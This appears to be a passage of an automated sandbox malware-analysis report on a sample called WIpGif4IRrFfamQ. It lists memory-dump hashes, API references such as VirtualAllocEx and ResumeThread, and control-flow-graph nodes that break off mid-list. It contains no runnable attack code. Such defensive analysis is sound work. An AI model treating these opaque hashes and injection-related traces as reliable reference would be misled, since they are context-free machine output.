                                                                                • Opcode Fuzzy Hash: 0a133bfc7e28f157aa0376c02f336a6b325342deadc39086e6cf4807fafa9da4
                                                                                • Instruction Fuzzy Hash: 3B219AB28003889FCB10DFA9C845AEEBFF5EF49314F20881AD559A7251C77AA550CBA0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077346CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 77ff92ba303b434e58b5760d81825c79079d9fc53bdfb1e2c5fb8e349334ab8e
                                                                                • Instruction ID: 58cab331662765614bb1864f54dc0d9217bd6dba22f210616f69ab3da757b20f
                                                                                • Opcode Fuzzy Hash: 77ff92ba303b434e58b5760d81825c79079d9fc53bdfb1e2c5fb8e349334ab8e
                                                                                • Instruction Fuzzy Hash: D21137B58002499FCB10DFAAC844AEEFFF5EF49314F108819E519A7250C779A550CFA0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: e1d40b5a57d76f28f997145deae683863ff6d628ce0536abbe14a3811f047b9a
                                                                                • Instruction ID: ff00a4f7f5ba4ef2857ec036aae2c0b7954259ebad8f8ea155614c7f4c6b748a
                                                                                • Opcode Fuzzy Hash: e1d40b5a57d76f28f997145deae683863ff6d628ce0536abbe14a3811f047b9a
                                                                                • Instruction Fuzzy Hash: 6E113AB1D002498FDB24DFAAD4457EEFBF5EF88314F20881AD519A7240CB79A544CFA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: a00620532228741453dbf805e8a187d0cad7c9332b4d6e58138c8de28d811c88
                                                                                • Instruction ID: 1eabb59e09961fd232495a90c791433185ade6e77cae2e81ad86d45b7dd08dad
                                                                                • Opcode Fuzzy Hash: a00620532228741453dbf805e8a187d0cad7c9332b4d6e58138c8de28d811c88
                                                                                • Instruction Fuzzy Hash: 20113AB1D002498FDB24DFAAD4457EEFBF5EF88314F20881AD519A7240CB79A544CFA4
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07739095
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 53667832f62a8d3268bedd5f0814427a1ba472dace884b3f1d3ead80c503a9b4
                                                                                • Instruction ID: ff6dc4f4886501ce22b1bbae9a5feda333f81d6fc0948001ab18bbab7c5b688d
                                                                                • Opcode Fuzzy Hash: 53667832f62a8d3268bedd5f0814427a1ba472dace884b3f1d3ead80c503a9b4
                                                                                • Instruction Fuzzy Hash: 1D1106B58007499FDB20DF99C584BDEFBF8EB48354F108859EA18A7201C379A954CFA1
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: bb825541710ae181a6b728368c967ac898d8e2a7e4489c721823069e3e230d2f
                                                                                • Instruction ID: 9d061e05b28931a5c02260f52ec3ab6ce090078152413c1b9eb7ea41b7d42221
                                                                                • Opcode Fuzzy Hash: bb825541710ae181a6b728368c967ac898d8e2a7e4489c721823069e3e230d2f
                                                                                • Instruction Fuzzy Hash: 1C1102B5C006498FCB10DF9AD545A9EFBF4AB48228F10841AD529A7210C379A545CFA1
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07739095
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: b035ac24465a8df0ff716a391d7a3a8176ae0c5cf43d49d717797994e9d5bef9
                                                                                • Instruction ID: 01db2b8e87fff2a1320a1328143bdde291fa8a443c0a976191b4abf1fe00204b
                                                                                • Opcode Fuzzy Hash: b035ac24465a8df0ff716a391d7a3a8176ae0c5cf43d49d717797994e9d5bef9
                                                                                • Instruction Fuzzy Hash: 3C1103B59002499FDB10DF99D448BEEFFF4FB49314F20885AE558A7211C37AA544CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 56a688f760e0cea233b3d94ac5cf17ca17bce7327255e33e629a54a8656d2a2c
                                                                                • Instruction ID: defe4688fdc8de57dcd0079d6834a897baddca8d0d00be531b8f3f50ccbdc8be
                                                                                • Opcode Fuzzy Hash: 56a688f760e0cea233b3d94ac5cf17ca17bce7327255e33e629a54a8656d2a2c
                                                                                • Instruction Fuzzy Hash: 722103B1504244DFDB05DF98D9C4F26BF65FB88318F20C56DEA090B356C33AE416CAA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41e063666b94d78b4e38727bdcb80cdb81dcc9650c662588e9cb5a69a41f4e3f
                                                                                • Instruction ID: 0317c859562ce09877024a01aee7990bf4045d842fc0062abb9f7bdc214d1e85
                                                                                • Opcode Fuzzy Hash: 41e063666b94d78b4e38727bdcb80cdb81dcc9650c662588e9cb5a69a41f4e3f
                                                                                • Instruction Fuzzy Hash: 3021F471504204DFDB05DF58D9C0B56BF65FB98314F20C56DDA090B356C33AF456C6A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060603474.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_170d000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7471379f96a05eac259228cbe3d56496196548471f8e584fae045689ea4acbf6
                                                                                • Instruction ID: b9cd527d0148d9f72e3553a7786ca7caa5a1edf222d36ce3c534fdbfcaed1068
                                                                                • Opcode Fuzzy Hash: 7471379f96a05eac259228cbe3d56496196548471f8e584fae045689ea4acbf6
                                                                                • Instruction Fuzzy Hash: 76210371604304DFDB26DFA8D984B16FFA5EB88314F20C5A9D90D4B296C33AD406CA61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: f841d90a50202a8da0fb2abc0b1a4e6f776c7bc4269701c064e08595e4199d49
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: 3611DF72404280CFCB02CF54D9C4B16BF71FB88314F24C6ADD9490B256C336E45ADBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: 100a1a4c7d7a3966619f0c4ad97c170592d76341cf954fda7bdc8cfcc82e80f1
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction Fuzzy Hash: 6C11CD72404240DFDB02CF44D9C4B56BF61FB84224F24C6A9DA090A656C33AE45ACBA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060603474.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_170d000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction ID: 235339f573d1290a891e73a7b7e18c12191520562383785395d3b611593a302c
                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction Fuzzy Hash: C511BE75504380CFDB12CF54D5C4B15FFA1FB48314F24C6A9D8494B696C33AD40ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ff59e75a56342521fe32349874b31da6dbdecc3d30e8e99fa0b1ce25faa48ec9
                                                                                • Instruction ID: aada200ddb45586245030930a94bfca34f59adc211e22121bfbd29b458ae3cb6
                                                                                • Opcode Fuzzy Hash: ff59e75a56342521fe32349874b31da6dbdecc3d30e8e99fa0b1ce25faa48ec9
                                                                                • Instruction Fuzzy Hash: D701DB710043849AE7209AA9CD84B77FF9CEF45324F18C52DEF094E297C379A841C671
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2060478133.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_16fd000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2e1cf20685792a69dad9e96cf901e9a7739097edd45b7a76c119d667d2597eba
                                                                                • Instruction ID: e7b0987cc9923bb27f75b995c448aababf68da4751f0ca462ce7d4dfcba893d7
                                                                                • Opcode Fuzzy Hash: 2e1cf20685792a69dad9e96cf901e9a7739097edd45b7a76c119d667d2597eba
                                                                                • Instruction Fuzzy Hash: 57F062724043849EE7218A1ACD84B66FF98EF85734F18C55AEE484E296C379A844CA71
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3bd36b5f54927a886949c1c1de4ffcebc3f70febf7503e6e733f6b0bea7f7139
                                                                                • Instruction ID: 2fdab3f95e4dd8d4bebf50bb5732a1ca15df5e5f5fb2cc655ac2cc0059b21141
                                                                                • Opcode Fuzzy Hash: 3bd36b5f54927a886949c1c1de4ffcebc3f70febf7503e6e733f6b0bea7f7139
                                                                                • Instruction Fuzzy Hash: 7DE118B4E001198FCB14DFA8C5809AEFBB2FF89345F248169E419AB356D735AD42CF61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ecdeea52b6fb23021db390baba98f9d3dd477164b8541d97c28789ae9fb56686
                                                                                • Instruction ID: 8406d02550aa5deffe9bc282353381d22a5f319942409a625850633e34de39a7
                                                                                • Opcode Fuzzy Hash: ecdeea52b6fb23021db390baba98f9d3dd477164b8541d97c28789ae9fb56686
                                                                                • Instruction Fuzzy Hash: FEE106B4E002598FCB14DFA8C5809AEBBB2FF89345F248169D419AB356D734AD42CF61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 76b00779892a9de601228b228e058cb8086058fe70c66fa8b5dbe70b49b01ecf
                                                                                • Instruction ID: 53fa3867373b8639820d8746f910c6a167e29ed248fdeddc5f4b42b5c8869c01
                                                                                • Opcode Fuzzy Hash: 76b00779892a9de601228b228e058cb8086058fe70c66fa8b5dbe70b49b01ecf
                                                                                • Instruction Fuzzy Hash: CCE149B4E001598FCB14DFA8C5809AEFBB2FF89341F248169E419AB356D735AD41CF61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b104dd509efcc5bbefcfe58856af32796814205174751d27b72d79b65f07737c
                                                                                • Instruction ID: d8a46e1c39b2c1f506cb40ed6b8905954089de24709d5f3e752e4009de61767a
                                                                                • Opcode Fuzzy Hash: b104dd509efcc5bbefcfe58856af32796814205174751d27b72d79b65f07737c
                                                                                • Instruction Fuzzy Hash: 4BE117B4E001598FCB14DFA8C5809AEFBB2FF89345F248169E419AB356D734AD41CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09b35a6c875f29d09c856cb266d5492569560734b4f1721aecbd696bc6315c34
                                                                                • Instruction ID: 0405d12f65854f351695b7a031c8b38e1e407a5256a10bc52156b6e35717336b
                                                                                • Opcode Fuzzy Hash: 09b35a6c875f29d09c856cb266d5492569560734b4f1721aecbd696bc6315c34
                                                                                • Instruction Fuzzy Hash: 15E139B4E006598FCB14DFA8C5809AEFBB2FF89345F248169D418AB356D734AD41CF61
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5eab83622d0ca921dc6c08ceb05aa9e1e1b2ea08312be92544394d4e987e631
                                                                                • Instruction ID: e27fd71ba519c6a404ad44c89c42b1cb95964ad54f19f2d57f272ef09d2427d9
                                                                                • Opcode Fuzzy Hash: d5eab83622d0ca921dc6c08ceb05aa9e1e1b2ea08312be92544394d4e987e631
                                                                                • Instruction Fuzzy Hash: D3A17A32E402098FCF09DFA4C94459EB7B3FF85304B25956EE805AB265DB31E916CB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 39a48eb11d47cab6a3cc03577cc72fdf17eccd77858c0ab5f4d0824306637c05
                                                                                • Instruction ID: 22250176cdaccb7d06424e8556743a430e75f1cbb57e4b7cf516202e4ee93860
                                                                                • Opcode Fuzzy Hash: 39a48eb11d47cab6a3cc03577cc72fdf17eccd77858c0ab5f4d0824306637c05
                                                                                • Instruction Fuzzy Hash: 7A510BB4E002198FCB14DFA9C9409AEBBB2FF89345F24C16AD418A7256D735AD41CFA1

                                                                                Execution Graph

                                                                                Execution Coverage:19.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:13.3%
                                                                                Total number of Nodes:30
                                                                                Total number of Limit Nodes:6
                                                                                execution_graph 19850 6b69e80 19851 6b69e87 19850->19851 19853 6b69e8d 19850->19853 19851->19853 19855 6b6a20e 19851->19855 19856 6b69590 19851->19856 19854 6b69590 LdrInitializeThunk 19854->19855 19855->19853 19855->19854 19857 6b695a2 19856->19857 19859 6b695a7 19856->19859 19857->19855 19858 6b69cd1 LdrInitializeThunk 19858->19857 19859->19857 19859->19858 19860 13fe2a8 19861 13fe2b4 19860->19861 19864 6b62970 19861->19864 19865 6b62992 19864->19865 19866 13fe353 19865->19866 19869 6b69590 LdrInitializeThunk 19865->19869 19871 6b69b94 19865->19871 19877 6b69580 19865->19877 19883 6b697b0 19865->19883 19869->19866 19876 6b69a4b 19871->19876 19872 6b69b8c LdrInitializeThunk 19874 6b69ce9 19872->19874 19874->19866 19875 6b69590 LdrInitializeThunk 19875->19876 19876->19872 19876->19875 19878 6b695a7 19877->19878 19879 6b695a2 19877->19879 19878->19879 19880 6b69b8c LdrInitializeThunk 19878->19880 19882 6b69590 LdrInitializeThunk 19878->19882 19879->19866 19880->19879 19882->19878 19884 6b697e1 19883->19884 19885 6b69941 19884->19885 19886 6b69b8c LdrInitializeThunk 19884->19886 19888 6b69590 LdrInitializeThunk 19884->19888 19885->19866 19886->19885 19888->19884

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 146 13f29e0-13f2a3b 150 13f2a5d-13f2aac 146->150 151 13f2a3d-13f2a5c 146->151 155 13f2aae-13f2ab5 150->155 156 13f2ac7-13f2acf 150->156 157 13f2abe-13f2ac5 155->157 158 13f2ab7-13f2abc 155->158 159 13f2ad2-13f2ae6 156->159 157->159 158->159 162 13f2afc-13f2b04 159->162 163 13f2ae8-13f2aef 159->163 166 13f2b06-13f2b0a 162->166 164 13f2af5-13f2afa 163->164 165 13f2af1-13f2af3 163->165 164->166 165->166 168 13f2b0c-13f2b21 166->168 169 13f2b6a-13f2b6d 166->169 168->169 175 13f2b23-13f2b26 168->175 170 13f2b6f-13f2b84 169->170 171 13f2bb5-13f2bbb 169->171 170->171 178 13f2b86-13f2b8a 170->178 173 13f36b6 171->173 174 13f2bc1-13f2bc3 171->174 181 13f36bb-13f3c65 173->181 174->173 176 13f2bc9-13f2bce 174->176 179 13f2b28-13f2b2a 175->179 180 13f2b45-13f2b63 call 13f02c8 175->180 182 13f3664-13f3668 176->182 183 13f2bd4 176->183 184 13f2b8c-13f2b90 178->184 185 13f2b92-13f2bb0 call 13f02c8 178->185 179->180 186 13f2b2c-13f2b2f 179->186 180->169 201 13f3c69-13f3ca4 181->201 188 13f366f-13f36b5 182->188 189 13f366a-13f366d 182->189 183->182 184->171 184->185 185->171 186->169 191 13f2b31-13f2b43 186->191 189->181 189->188 191->169 191->180 201->201 202 13f3ca6-13f3cd9 201->202 206 13f3cdb-13f3cdd 202->206 207 13f3cea-13f3cf2 202->207 208 13f3cdf-13f3ce1 206->208 209 13f3ce3-13f3ce8 206->209 210 13f3cf4-13f3d02 207->210 208->210 209->210 213 13f3d18-13f3d20 210->213 214 13f3d04-13f3d06 210->214 217 13f3d23-13f3d26 213->217 215 13f3d0f-13f3d16 214->215 216 13f3d08-13f3d0d 214->216 215->217 216->217 219 13f3d3d-13f3d41 217->219 220 13f3d28-13f3d36 217->220 221 13f3d5a-13f3d5d 219->221 222 13f3d43-13f3d51 219->222 220->219 226 13f3d38 220->226 224 13f3d5f-13f3d63 221->224 225 13f3d65-13f3d9a 221->225 222->221 231 13f3d53 222->231 224->225 228 13f3d9c-13f3db3 224->228 233 13f3dfc-13f3e01 225->233 226->219 229 13f3db9-13f3dc5 228->229 230 13f3db5-13f3db7 228->230 234 13f3dcf-13f3dd9 229->234 235 13f3dc7-13f3dcd 229->235 230->233 231->221 237 13f3de1 234->237 238 13f3ddb 234->238 235->237 240 13f3de9-13f3df5 237->240 238->237 240->233
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                • API String ID: 0-499371476
                                                                                • Opcode ID: 19e138bf3ba95881f18164d925378ecd481506c31d5b7cfe283dbe16232c69f1
                                                                                • Instruction ID: 349418ebdfd3314959f477baa965ca18c714fc53ab59baf08bc62d26cf12578e
                                                                                • Opcode Fuzzy Hash: 19e138bf3ba95881f18164d925378ecd481506c31d5b7cfe283dbe16232c69f1
                                                                                • Instruction Fuzzy Hash: CB52C032D04757CBC7B5CF38C9D629BBFB1BF41224B58889ED88686606E334AC11DB52

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 243 13fc468-13fc471 244 13fc473-13fc498 243->244 245 13fc450-13fc45e 243->245 246 13fc49f-13fc57c call 13f41a0 call 13f3cc0 244->246 247 13fc49a 244->247 257 13fc57e 246->257 258 13fc583-13fc5a4 call 13f5658 246->258 247->246 257->258 260 13fc5a9-13fc5b4 258->260 261 13fc5bb-13fc5bf 260->261 262 13fc5b6 260->262 263 13fc5c4-13fc5cb 261->263 264 13fc5c1-13fc5c2 261->264 262->261 265 13fc5cd 263->265 266 13fc5d2-13fc5e0 263->266 267 13fc5e3-13fc627 264->267 265->266 266->267 271 13fc68d-13fc6a4 267->271 273 13fc629-13fc63f 271->273 274 13fc6a6-13fc6cb 271->274 278 13fc669 273->278 279 13fc641-13fc64d 273->279 281 13fc6cd-13fc6e2 274->281 282 13fc6e3 274->282 280 13fc66f-13fc68c 278->280 283 13fc64f-13fc655 279->283 284 13fc657-13fc65d 279->284 280->271 281->282 285 13fc667 283->285 284->285 285->280
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.4473532353.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_13f0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0odp$Akq$Ljdp$Ljdp$PH]q$PH]q
                                                                                • API String ID: 0-3107611379
                                                                                • Opcode ID: ee8cfd1bbd7f0f2fda1a416497856d9651fd78aa531195901dbaa6c44fc4138a
                                                                                • Instruction ID: 94122de0f0e2095e49a9b8e131300e6c295b4986228b2790938bf91144f0a4ca
                                                                                • Opcode Fuzzy Hash: ee8cfd1bbd7f0f2fda1a416497856d9651fd78aa531195901dbaa6c44fc4138a
                                                                                • Instruction Fuzzy Hash: B481D374E00218CFDB18DFAAD984A9DBBF2BF88314F14D069E519AB365DB309945CF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 289 13f6fc8-13f6ffe 290 13f7006-13f700c 289->290 441 13f7000 call 13f7118 289->441 442 13f7000 call 13f6fc8 289->442 443 13f7000 call 13f69a0 289->443 291 13f700e-13f7012 290->291 292 13f705c-13f7060 290->292 293 13f7014-13f7019 291->293 294 13f7021-13f7028 291->294 295 13f7077-13f708b 292->295 296 13f7062-13f7071 292->296 293->294 298 13f70fe-13f713b 294->298 299 13f702e-13f7035 294->299 297 13f7093-13f709a 295->297 437 13f708d call 13fa0e8 295->437 438 13f708d call 13f9de0 295->438 439 13f708d call 13f9dd0 295->439 300 13f709d-13f70a7 296->300 301 13f7073-13f7075 296->301 310 13f713d-13f7143 298->310 311 13f7146-13f7166 298->311 299->292 304 13f7037-13f703b 299->304 302 13f70a9-13f70af 300->302 303 13f70b1-13f70b5 300->303 301->297 306 13f70bd-13f70f7 302->306 303->306 307 13f70b7 303->307 308 13f703d-13f7042 304->308 309 13f704a-13f7051 304->309 306->298 307->306 308->309 309->298 312 13f7057-13f705a 309->312 310->311 317 13f716d-13f7174 311->317 318 13f7168 311->318 312->297 320 13f7176-13f7181 317->320 321 13f74fc-13f7505 318->321 322 13f750d-13f7519 320->322 323 13f7187-13f719a 320->323 330 13f751b-13f7521 322->330 331 13f755a-13f755b 322->331 328 13f719c-13f71aa 323->328 329 13f71b0-13f71cb 323->329 328->329 338 13f7484-13f748b 328->338 341 13f71ef-13f71f2 329->341 342 13f71cd-13f71d3 329->342 332 13f7523-13f7549 330->332 333 13f7562-13f7585 330->333 334 13f755c-13f755d 331->334 339 13f754b-13f7550 332->339 340 13f7552-13f7556 332->340 347 13f758b-13f759a 333->347 348 13f7587-13f7589 333->348 338->321 346 13f748d-13f748f 338->346 339->334 340->331 349 13f734c-13f7352 341->349 350 13f71f8-13f71fb 341->350 344 13f71dc-13f71df 342->344 345 13f71d5 342->345 352 13f7212-13f7218 344->352 353 13f71e1-13f71e4 344->353 345->344 345->349 351 13f743e-13f7441 345->351 345->352 354 13f749e-13f74a4 346->354 355 13f7491-13f7496 346->355 374 13f759c-13f75ab 347->374 375 13f75e4 347->375 356 13f75e9-13f75eb 348->356 349->351 357 13f7358-13f735d 349->357 350->349 358 13f7201-13f7207 350->358 359 13f7508 351->359 360 13f7447-13f744d 351->360 361 13f721e-13f7220 352->361 362 13f721a-13f721c 352->362 363 13f727e-13f7284 353->363 364 13f71ea 353->364 354->322 365 13f74a6-13f74ab 354->365 355->354 357->351 358->349 367 13f720d 358->367 359->322 369 13f744f-13f7457 360->369 370 13f7472-13f7476 360->370 371 13f722a-13f7233 361->371 362->371 363->351 368 13f728a-13f7290 363->368 364->351 372 13f74ad-13f74b2 365->372 373 13f74f0-13f74f3 365->373 367->351 376 13f7296-13f7298 368->376 377 13f7292-13f7294 368->377 369->322 378 13f745d-13f746c 369->378 370->338 381 13f7478-13f747e 370->381 379 13f7246-13f726e 371->379 380 13f7235-13f7240 371->380 372->359 383 13f74b4 372->383 373->359 382 13f74f5-13f74fa 373->382 374->375 389 13f75ad-13f75b3 374->389 375->356 385 13f72a2-13f72b9 376->385 377->385 378->329 378->370 410 13f7274-13f7279 379->410 411 13f7362-13f7398 379->411 380->351 380->379 381->320 381->338 382->321 382->346 386 13f74bb-13f74c0 383->386 401 13f72bb-13f72d4 385->401 402 13f72e4-13f730b 385->402 387 13f74e2-13f74e4 386->387 388 13f74c2-13f74c4 386->388 387->359 398 13f74e6-13f74e9 387->398 393 13f74c6-13f74cb 388->393 394 